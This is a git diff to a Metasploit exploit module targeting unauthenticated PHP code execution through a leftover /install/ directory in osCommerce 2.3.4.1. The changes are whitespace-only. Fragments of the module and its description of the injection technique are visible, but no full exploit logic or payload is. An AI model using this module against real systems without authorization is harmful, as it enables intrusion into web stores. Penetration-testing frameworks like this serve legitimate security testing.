diff --git a/modules/exploits/multi/http/oscommerce_installer_unauth_code_exec.rb b/modules/exploits/multi/http/oscommerce_installer_unauth_code_exec.rb index b5034d4e8e..bd3cdb950a 100644 --- a/modules/exploits/multi/http/oscommerce_installer_unauth_code_exec.rb +++ b/modules/exploits/multi/http/oscommerce_installer_unauth_code_exec.rb @@ -12,10 +12,10 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'osCommerce Installer Unauthenticated Code Execution', 'Description' => %q{ - If the /install/ directory was not removed, it is possible for an unauthenticated - attacker to run the "install_4.php" script, which will create the configuration - file for the installation. This allows the attacker to inject PHP code into the - configuration file and execute it. + If the /install/ directory was not removed, it is possible for an unauthenticated + attacker to run the "install_4.php" script, which will create the configuration + file for the installation. This allows the attacker to inject PHP code into the + configuration file and execute it. }, 'Author' => [ 'Simon Scannell', # Original exploit author @@ -34,15 +34,15 @@ class MetasploitModule < Msf::Exploit::Remote 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Targets' => - [ - [ 'osCommerce 2.3.4.1', { } ], - ], + [ + [ 'osCommerce 2.3.4.1', { } ], + ], 'DisclosureDate' => 'Apr 30 2018', 'DefaultTarget' => 0)) register_options( - [ - OptString.new('URI', [true, 'The path to the install directory', '/catalog/install/']) - ]) + [ + OptString.new('URI', [true, 'The path to the install directory', '/catalog/install/']) + ]) end def check @@ -80,6 +80,6 @@ class MetasploitModule < Msf::Exploit::Remote 'method' => 'POST', 'vars_post' => data }) - trigger + trigger end end